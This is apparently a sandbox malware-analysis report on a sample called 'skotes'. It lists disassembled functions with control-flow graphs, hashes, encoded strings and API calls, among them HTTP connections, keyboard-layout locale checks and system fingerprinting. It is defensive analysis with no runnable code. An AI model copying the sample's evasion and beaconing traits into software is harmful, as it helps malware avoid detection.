                                                  • Instruction ID: 15b624b952b2ade46a41d025a950956a0ebb171a2275fbd713cad6ea5aa820fb
                                                  • Opcode Fuzzy Hash: 00c1335ed0b2aa781634118692d474fea64d90b33bc755316ca7a9f46ca56be0
                                                  • Instruction Fuzzy Hash: ECB1E3B06102189FDB28CF28CC84BAEBBB5EF45304F5085A9F549972D1DB759AC4CBB4
                                                  Function 00D747B0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2516COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D77A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00D77AEC
                                                    • Part of subcall function 00D77A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00D77AF8
                                                    • Part of subcall function 00D77A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00D77B01
                                                    • Part of subcall function 00D6BE30: Sleep.KERNELBASE(000005DC), ref: 00D6BEB8
                                                    • Part of subcall function 00D6BE30: InternetOpenW.WININET(00DB8DC8,00000000,00000000,00000000,00000000), ref: 00D6BEC7
                                                    • Part of subcall function 00D6BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00D6BEEC
                                                    • Part of subcall function 00D6BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00D6BF36
                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00D74F92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                                  • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
                                                  • API String ID: 4201286991-1982281295
                                                  • Opcode ID: 5edc225660627690c17763df9460d7e4ff1234299d16e28afcb5518b2c6c638e
                                                  • Instruction ID: d465746c53e972d8415348ea992ce9bd9b8b0a6bc5aebf2c1a4b5770cc6c42a9
                                                  • Opcode Fuzzy Hash: 5edc225660627690c17763df9460d7e4ff1234299d16e28afcb5518b2c6c638e
                                                  • Instruction Fuzzy Hash: FC23E271A002588BEB19DB28CD8979DBBB6DF81304F54C1D8E04DA7286FB759B848F71
                                                  Function 00D65EE0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 340COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 921 d65ee0-d65fde 927 d65fe0-d65fec 921->927 928 d66008-d66015 call d7cff1 921->928 930 d65ffe-d66005 call d7d663 927->930 931 d65fee-d65ffc 927->931 930->928 931->930 933 d66016-d6619d call d96c6a call d7e150 call d780c0 * 5 RegOpenKeyExA 931->933 950 d661a3-d66233 call d940f0 933->950 951 d664b1-d664ba 933->951 977 d6649f-d664ab 950->977 978 d66239-d6623d 950->978 953 d664e7-d664f0 951->953 954 d664bc-d664c7 951->954 955 d664f2-d664fd 953->955 956 d6651d-d66526 953->956 958 d664dd-d664e4 call d7d663 954->958 959 d664c9-d664d7 954->959 960 d66513-d6651a call d7d663 955->960 961 d664ff-d6650d 955->961 962 d66553-d6655c 956->962 963 d66528-d66533 956->963 958->953 959->958 964 d665d7-d665df call d96c6a 959->964 960->956 961->960 961->964 971 d66585-d6658e 962->971 972 d6655e-d66569 962->972 968 d66535-d66543 963->968 969 d66549-d66550 call d7d663 963->969 968->964 968->969 969->962 974 d66590-d6659f 971->974 975 d665bb-d665d6 call d7cff1 971->975 981 d6657b-d66582 call d7d663 972->981 982 d6656b-d66579 972->982 983 d665b1-d665b8 call d7d663 974->983 984 d665a1-d665af 974->984 977->951 986 d66243-d66279 RegEnumValueA 978->986 987 d66499 978->987 981->971 982->964 982->981 983->975 984->964 984->983 994 d66486-d6648d 986->994 995 d6627f-d6629e 986->995 987->977 994->986 996 d66493 994->996 998 d662a0-d662a5 995->998 996->987 998->998 999 d662a7-d662fb call d780c0 call d77a00 * 2 call d65d50 998->999 999->994
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                  • API String ID: 0-3963862150
                                                  • Opcode ID: dcda553cd86e8fced8a84f8f1c6eee9441769f40f4c3b085db820e2fbdb16682
                                                  • Instruction ID: 08b1200775e39ad112b7fb0e656a4ba1c1e6d16f3632bdfc22ff27c74ed2f464
                                                  • Opcode Fuzzy Hash: dcda553cd86e8fced8a84f8f1c6eee9441769f40f4c3b085db820e2fbdb16682
                                                  • Instruction Fuzzy Hash: 8DD1A1719002589BEB24DF54CC89BDEB7B9EF04300F5442D9F509E7291DB74ABA88FA4
                                                  Function 00D67D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1007 d67d30-d67db2 call d940f0 1011 d68356-d68373 call d7cff1 1007->1011 1012 d67db8-d67de0 call d77a00 call d65c10 1007->1012 1019 d67de4-d67e06 call d77a00 call d65c10 1012->1019 1020 d67de2 1012->1020 1025 d67e0a-d67e23 1019->1025 1026 d67e08 1019->1026 1020->1019 1029 d67e54-d67e7f 1025->1029 1030 d67e25-d67e34 1025->1030 1026->1025 1031 d67eb0-d67ed1 1029->1031 1032 d67e81-d67e90 1029->1032 1033 d67e36-d67e44 1030->1033 1034 d67e4a-d67e51 call d7d663 1030->1034 1039 d67ed7-d67edc 1031->1039 1040 d67ed3-d67ed5 GetNativeSystemInfo 1031->1040 1037 d67ea6-d67ead call d7d663 1032->1037 1038 d67e92-d67ea0 1032->1038 1033->1034 1035 d68374 call d96c6a 1033->1035 1034->1029 1045 d68379-d6837f call d96c6a 1035->1045 1037->1031 1038->1035 1038->1037 1044 d67edd-d67ee6 1039->1044 1040->1044 1048 d67f04-d67f07 1044->1048 1049 d67ee8-d67eef 1044->1049 1052 d682f7-d682fa 1048->1052 1053 d67f0d-d67f16 1048->1053 1050 d67ef5-d67eff 1049->1050 1051 d68351 1049->1051 1055 d6834c 1050->1055 1051->1011 1052->1051 1058 d682fc-d68305 1052->1058 1056 d67f18-d67f24 1053->1056 1057 d67f29-d67f2c 1053->1057 1055->1051 1056->1055 1060 d682d4-d682d6 1057->1060 1061 d67f32-d67f39 1057->1061 1062 d68307-d6830b 1058->1062 1063 d6832c-d6832f 1058->1063 1064 d682e4-d682e7 1060->1064 1065 d682d8-d682e2 1060->1065 1066 d67f3f-d67f9b call d77a00 call d65c10 call d77a00 call d65c10 call d65d50 1061->1066 1067 d68019-d682bd call d77a00 call d65c10 call d77a00 call d65c10 call d65d50 call d77a00 call d65c10 call d65730 call d77a00 call d65c10 call d77a00 call d65c10 call d65d50 call d77a00 call d65c10 call d65730 call d77a00 call d65c10 call d77a00 call d65c10 call d65d50 call d77a00 call d65c10 call d65730 call d77a00 call d65c10 call d77a00 call d65c10 call d65d50 call d77a00 call d65c10 call d65730 1061->1067 1068 d68320-d6832a 1062->1068 1069 d6830d-d68312 1062->1069 1070 d68331-d6833b 1063->1070 1071 d6833d-d68349 1063->1071 1064->1051 1072 d682e9-d682f5 1064->1072 1065->1055 1092 d67fa0-d67fa7 1066->1092 1106 d682c3-d682cc 1067->1106 1068->1051 1069->1068 1074 d68314-d6831e 1069->1074 1070->1051 1071->1055 1072->1055 1074->1051 1094 d67fab-d67fcb call d98bbe 1092->1094 1095 d67fa9 1092->1095 1101 d68002-d68004 1094->1101 1102 d67fcd-d67fdc 1094->1102 1095->1094 1101->1106 1107 d6800a-d68014 1101->1107 1104 d67ff2-d67fff call d7d663 1102->1104 1105 d67fde-d67fec 1102->1105 1104->1101 1105->1045 1105->1104 1106->1052 1111 d682ce 1106->1111 1107->1106 1111->1060
                                                  APIs
                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D67ED3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoNativeSystem
                                                  • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                  • API String ID: 1721193555-3123340372
                                                  • Opcode ID: 43371ff447e4123cae7d62aafe376e29917b015d64891903145be2f69d16a21d
                                                  • Instruction ID: 369600cad772916844ed5a9073171200601ab90a1e818b120af96274790d9bbf
                                                  • Opcode Fuzzy Hash: 43371ff447e4123cae7d62aafe376e29917b015d64891903145be2f69d16a21d
                                                  • Instruction Fuzzy Hash: A8E10670E002459BDB24BB28DC0B7AD7B61EB41724F94469CE419A73C2EF354E958BF2
                                                  Function 00D9D634 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1281 d9d634-d9d655 call d7df80 1284 d9d66f-d9d672 1281->1284 1285 d9d657 1281->1285 1286 d9d68e-d9d69a call d9a7c8 1284->1286 1287 d9d674-d9d677 1284->1287 1285->1286 1288 d9d659-d9d65f 1285->1288 1301 d9d69c-d9d69f 1286->1301 1302 d9d6a4-d9d6b0 call d9d5be 1286->1302 1289 d9d679-d9d67c 1287->1289 1290 d9d683-d9d68c call d9d57c 1287->1290 1288->1290 1292 d9d661-d9d665 1288->1292 1294 d9d67e-d9d681 1289->1294 1295 d9d6b2-d9d6c2 call d975f6 call d96c5a 1289->1295 1304 d9d6cc-d9d6d5 1290->1304 1292->1286 1293 d9d667-d9d66b 1292->1293 1293->1295 1298 d9d66d 1293->1298 1294->1290 1294->1295 1295->1301 1298->1290 1305 d9d80b-d9d81a 1301->1305 1302->1295 1311 d9d6c4-d9d6c9 1302->1311 1308 d9d6e2-d9d6f3 1304->1308 1309 d9d6d7-d9d6df call d98dc8 1304->1309 1314 d9d709 1308->1314 1315 d9d6f5-d9d707 1308->1315 1309->1308 1311->1304 1317 d9d70b-d9d71c 1314->1317 1315->1317 1318 d9d78a-d9d79a call d9d7c7 1317->1318 1319 d9d71e-d9d720 1317->1319 1328 d9d809 1318->1328 1329 d9d79c-d9d79e 1318->1329 1321 d9d81b-d9d81d 1319->1321 1322 d9d726-d9d728 1319->1322 1325 d9d81f-d9d826 call d98e10 1321->1325 1326 d9d827-d9d83a call d965ed 1321->1326 1323 d9d72a-d9d72d 1322->1323 1324 d9d734-d9d740 1322->1324 1323->1324 1330 d9d72f-d9d732 1323->1330 1331 d9d780-d9d788 1324->1331 1332 d9d742-d9d757 call d9d62b * 2 1324->1332 1325->1326 1345 d9d848-d9d84e 1326->1345 1346 d9d83c-d9d846 1326->1346 1328->1305 1335 d9d7d9-d9d7e2 1329->1335 1336 d9d7a0-d9d7b6 call d9a671 1329->1336 1330->1324 1337 d9d75a-d9d75c 1330->1337 1331->1318 1332->1337 1359 d9d7e5-d9d7e8 1335->1359 1336->1359 1337->1331 1343 d9d75e-d9d76e 1337->1343 1350 d9d770-d9d775 1343->1350 1352 d9d850-d9d851 1345->1352 1353 d9d867-d9d878 RtlAllocateHeap 1345->1353 1346->1345 1351 d9d87c-d9d887 call d975f6 1346->1351 1350->1318 1355 d9d777-d9d77e 1350->1355 1362 d9d889-d9d88b 1351->1362 1352->1353 1357 d9d87a 1353->1357 1358 d9d853-d9d85a call d99dc0 1353->1358 1355->1350 1357->1362 1358->1351 1371 d9d85c-d9d865 call d98e36 1358->1371 1363 d9d7ea-d9d7ed 1359->1363 1364 d9d7f4-d9d7fc 1359->1364 1363->1364 1369 d9d7ef-d9d7f2 1363->1369 1364->1328 1366 d9d7fe-d9d806 call d9a671 1364->1366 1366->1328 1369->1328 1369->1364 1371->1351 1371->1353
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 272613a6458b16905feab86ce495901f4269570ef7a7cc90f26e31cbe6471323
                                                  • Instruction ID: 140653a47ecf41257d512bd862fcb99344c6847f8eb4ee9143c23eaea9ea5a45
                                                  • Opcode Fuzzy Hash: 272613a6458b16905feab86ce495901f4269570ef7a7cc90f26e31cbe6471323
                                                  • Instruction Fuzzy Hash: E961E432D002189FDF25EFA8D8856EDB7B2EF55310F2D811AE85AAB251D7319C40CBB1
                                                  Function 00D68380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1375 d68380-d68401 call d940f0 1379 d68403-d68408 1375->1379 1380 d6840d-d68435 call d77a00 call d65c10 1375->1380 1381 d6854f-d6856b call d7cff1 1379->1381 1388 d68437 1380->1388 1389 d68439-d6845b call d77a00 call d65c10 1380->1389 1388->1389 1394 d6845f-d68478 1389->1394 1395 d6845d 1389->1395 1398 d6847a-d68489 1394->1398 1399 d684a9-d684d4 1394->1399 1395->1394 1400 d6849f-d684a6 call d7d663 1398->1400 1401 d6848b-d68499 1398->1401 1402 d684d6-d684e5 1399->1402 1403 d68501-d68522 1399->1403 1400->1399 1401->1400 1404 d6856c-d68571 call d96c6a 1401->1404 1406 d684f7-d684fe call d7d663 1402->1406 1407 d684e7-d684f5 1402->1407 1408 d68524-d68526 GetNativeSystemInfo 1403->1408 1409 d68528-d6852d 1403->1409 1406->1403 1407->1404 1407->1406 1413 d6852e-d68535 1408->1413 1409->1413 1413->1381 1415 d68537-d6853f 1413->1415 1418 d68541-d68546 1415->1418 1419 d68548-d6854b 1415->1419 1418->1381 1419->1381 1420 d6854d 1419->1420 1420->1381
                                                  APIs
                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 00D68524
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoNativeSystem
                                                  • String ID:
                                                  • API String ID: 1721193555-0
                                                  • Opcode ID: e1f04c2db16270607995af576a70337b2bb7102db5cfcff051183d2dbe64c5d1
                                                  • Instruction ID: b6d0cdac38da05d38407e971fcc65959b3c61d945fb598f9ef3dff3ced3e0c0d
                                                  • Opcode Fuzzy Hash: e1f04c2db16270607995af576a70337b2bb7102db5cfcff051183d2dbe64c5d1
                                                  • Instruction Fuzzy Hash: 88512770D002089BDB28EB68CD49BDEB775EB45310F5043A9E409A72C1EF759EC48BB1
                                                  Function 00D9D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1421 d9d82f-d9d83a 1422 d9d848-d9d84e 1421->1422 1423 d9d83c-d9d846 1421->1423 1425 d9d850-d9d851 1422->1425 1426 d9d867-d9d878 RtlAllocateHeap 1422->1426 1423->1422 1424 d9d87c-d9d887 call d975f6 1423->1424 1431 d9d889-d9d88b 1424->1431 1425->1426 1427 d9d87a 1426->1427 1428 d9d853-d9d85a call d99dc0 1426->1428 1427->1431 1428->1424 1434 d9d85c-d9d865 call d98e36 1428->1434 1434->1424 1434->1426
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00D9A72D,?,?,?,00D9666A,?,00D66F28,00000000,00000000,766545D9), ref: 00D9D871
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: bb7972932e1d79e6c520ae4df9a26e9de137af6bc4f1a6cc6baf320b0341118a
                                                  • Instruction ID: 529448660cd70286f8c56eccca032d01fa0d8de8cbae87382c0c87504df66464
                                                  • Opcode Fuzzy Hash: bb7972932e1d79e6c520ae4df9a26e9de137af6bc4f1a6cc6baf320b0341118a
                                                  • Instruction Fuzzy Hash: 71F0823261522566EF216A769C05A5B775BDF857B0B1D8522FD08A7183DA30EC01D6F0
                                                  Function 053E0C64 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1495 53e0c64-53e0c65 1496 53e0c67-53e0c6c 1495->1496 1497 53e0cb3-53e0cb5 1495->1497 1498 53e0c6e-53e0cad 1496->1498 1499 53e0ce5-53e0ce8 1496->1499 1500 53e0cb8-53e0ce2 1497->1500 1498->1500 1502 53e0cea-53e0cf7 1499->1502 1503 53e0d15-53e0d9c 1499->1503 1506 53e0cf8-53e0cff call 53e0d01 1500->1506 1502->1506 1513 53e0da2-53e0de3 1503->1513
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S
                                                  • API String ID: 0-543223747
                                                  • Opcode ID: 48d398562ca938e7a7d280e84cba225475ffdd211cfb9bba989cf0d1ce54b4a4
                                                  • Instruction ID: bee0889bd6b8da21d9db3af1773e06fb4bc749d8b8cffe93967975a60ac1f961
                                                  • Opcode Fuzzy Hash: 48d398562ca938e7a7d280e84cba225475ffdd211cfb9bba989cf0d1ce54b4a4
                                                  • Instruction Fuzzy Hash: 5631F6BB14D2A0AEE306C6515A585F77FF9EAC323033444B7F442DB882D2D5590E9332
                                                  Function 053E0CD1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1518 53e0cd1-53e0ce8 1520 53e0cea-53e0cff call 53e0d01 1518->1520 1521 53e0d15-53e0d9c 1518->1521 1528 53e0da2-53e0de3 1521->1528
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3382973415.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_53e0000_skotes.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S
                                                  • API String ID: 0-543223747
                                                  • Opcode ID: 6e09dd41f8587a47bf1163673bd5a90087c0fdc09e6da21ab5117bd7414ba7a6
                                                  • Instruction ID: e827686804826d22685c0d65fe67c542c60446cac0c5a92f028ac7dfb0256298
                                                  • Opcode Fuzzy Hash: 6e09dd41f8587a47bf1163673bd5a90087c0fdc09e6da21ab5117bd7414ba7a6
                                                  • Instruction Fuzzy Hash: FC11E97B50D2A09EE312C65159685F77BFDE9C373033444BBF441CB497D299190A9332
                                                  Function 00D76C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmpDownload File
